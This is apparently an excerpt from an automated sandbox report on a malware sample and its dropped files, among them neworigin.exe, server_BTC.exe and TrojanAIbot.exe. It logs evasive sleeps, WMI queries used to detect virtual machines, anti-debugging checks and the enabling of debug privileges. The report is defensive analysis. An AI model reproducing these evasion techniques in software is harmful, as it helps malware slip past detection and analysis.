Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -99632s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5600 Thread sleep count: 6074 > 30
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -99517s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -99376s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -98968s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -98832s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -98708s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -98583s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -98458s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -98333s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -98208s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -98083s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -97958s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -97833s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -97708s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -97583s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -97458s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -97333s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -97208s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -97083s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -96958s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -96833s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -96708s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -96560s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -96451s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -96297s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -96189s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -96068s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -95943s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -95818s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -95693s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -95568s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -95443s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -95318s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -95193s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -95068s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -94943s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -94818s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -94693s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -94568s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -94443s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -94318s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -94193s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -94068s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -93916s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -93660s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -93536s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -93411s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572 Thread sleep time: -93286s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe TID: 4092 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 5756 Thread sleep time: -922337203685477s >= -30000s
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E65908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA, 0_2_02E65908
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 100000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99824 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99708 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99589 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99478 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99320 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99166 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98927 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98725 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98603 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98483 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98368 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98260 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98117 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97989 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97846 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97719 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97609 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97496 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97382 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97274 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97160 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97035 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96912 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96772 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96646 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96522 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96281 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96059 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95943 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95818 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95693 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95568 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95443 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95318 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95193 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95055 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94941 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94818 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94696 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94582 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94459 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94334 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94209 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94084 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 93960 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 93844 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99725 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99616 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99505 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99382 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99261 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99148 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99039 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98907 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98803 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Thread delayed: delay time: 60000
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Thread delayed: delay time: 60000
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 100000
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99349
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99157
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98999
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98869
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98758
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98649
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98531
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98377
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98238
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98089
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97963
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97828
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97713
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97603
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97479
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97335
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97079
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96552
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96360
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96152
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96008
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95868
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95747
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95592
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95416
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95272
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95135
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95030
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94898
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94777
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94635
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94473
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94153
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99790
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99586
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99417
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99297
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99183
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99076
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98962
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98850
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98723
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98333
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98182
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98071
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97964
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97854
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97743
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97635
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97524
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97417
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97307
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97197
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97087
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96979
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96869
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96759
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96650
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96540
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96432
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96323
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96213
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96103
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95994
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95881
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95761
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95640
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95519
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95386
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 100000
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99886
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99771
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99632
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99517
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99376
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98968
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98832
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98708
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98583
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98458
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98333
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98208
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98083
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97958
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97833
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97708
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97583
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97458
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97333
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97208
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97083
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96958
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96833
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96708
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96560
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96451
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96297
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96189
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96068
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95943
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95818
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95693
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95568
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95443
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95318
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95193
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95068
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94943
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94818
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94693
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94568
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94443
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94318
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94193
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94068
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 93916
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 93660
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 93536
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 93411
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 93286
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\
Source: 2jbMIxCFsK.exe, 00000000.00000002.2156227554.00000000005BE000.00000004.00000020.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2156227554.0000000000608000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: 2jbMIxCFsK.exe, 00000000.00000002.2156227554.0000000000608000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWC
Source: neworigin.exe, 00000009.00000002.2320882998.0000000000AC9000.00000004.00000020.00020000.00000000.sdmp, Wisrysxl.PIF, 00000016.00000002.2308974209.00000000005B1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E7F744 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent, 0_2_02E7F744
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Process queried: DebugPort
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Process queried: DebugPort
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E7894C LoadLibraryW,GetProcAddress,FreeLibrary, 0_2_02E7894C
Enables debug privileges
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process token adjusted: Debug Jump to behavior
